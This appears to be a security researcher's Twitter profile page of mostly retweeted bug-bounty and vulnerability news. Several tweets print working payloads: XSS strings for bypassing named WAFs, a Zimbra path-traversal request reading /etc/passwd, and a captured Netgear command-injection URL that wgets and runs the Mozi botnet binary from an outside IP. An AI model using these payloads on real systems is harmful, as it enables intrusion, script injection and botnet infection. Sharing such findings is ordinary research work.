YongShao

@YongShao_feng

Security Researcher、1AQ Team@1aq.com、Speaker&Founder

Joined November 2015

Tweets

  1. Retweeted
    Jan 31

    Wow! "Resources for Beginner Bug Bounty Hunters" has over 1000 stars on GitHub now and we just pushed a new update! Check it out:

  2. Retweeted
    Jan 4
  3. Retweeted
    Jan 16

    New tool coming soon... Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.

  4. Retweeted
    Jan 10

    Citrix ADC/Netscaler RCE (CVE-2019-19781) 😬

  5. Retweeted
    Jan 5

    Observed a weird WAF bypass case: > WAF blocked <img> tag > 'src' attr got blocked too > Found WAF didn't block <image> Finally crafted: <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> > BOOM

  6. Retweeted
    Jan 3

    P1 on new year (zimbra LFI) []/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00

  7. Retweeted
    Jan 2

    Exploiting Wi-Fi stack on Tesla Model S. Details of vulnerabilities and exploitation:

  8. Retweeted
    Jan 1

    Why not step into the next decade with WAF bypasses? Here are some gifts.😎 - Imperva <a69/onclick=write&lpar;&rpar;>pew - DotDefender <a69/onclick=[0].map(alert)>pew - Cloudbric <a69/onclick=[1].findIndex(alert)>pew Happy 0x32303230.😉

  9. Retweeted
    Dec 30, 2019

    This Kung Fu master is faster than gravity! WoW! 😎

  10. Retweeted
    Dec 18, 2019

    If you look into the right place, even Google can make some easy mistakes 👀👀 Check it out

  11. Dec 24, 2019

    There is no Santa Claus in this world 🎅 All the surprises and gifts 🎁 come from me, the one who loves you 👨

  12. Retweeted
    Dec 24, 2019

    Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.

  13. Retweeted
    Dec 21, 2019

    New writeup, one of my favorite bugs 🤠 - Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty Featuring...

  14. Retweeted
    Dec 10, 2019

    AirDoS: Found a bug in iOS that lets you make nearby devices unusable through AirDrop:

  15. Retweeted
    Dec 10, 2019

    Learn how found and exploited SockPuppet for iOS 12.4, featuring a bonus collaboration with LiveOverflow!

  16. Retweeted
    Dec 10, 2019

    An ancient Struts2 RCE vulnerability, CVE-2012-1592, the statement was updated by RedHat several days ago.

  17. Retweeted
    Dec 8, 2019

    A WAF bypass payload by <img src=something onauxclick="new Function `al\ert\`xss\``">

  18. Retweeted
    Dec 7, 2019

    Interesting.. /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.17.163.139:35681/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

  19. Retweeted
    Dec 7, 2019

    Tunneling traffic through MySQL service (or your mysqld is my new SOCKS5) by My old MySQL UDF PoCs are still hot 🔥

  20. Retweeted
    Dec 8, 2019

    GitHub - Symbo1/HackerOne-Staffs: 300+company -> 3k+Staffs
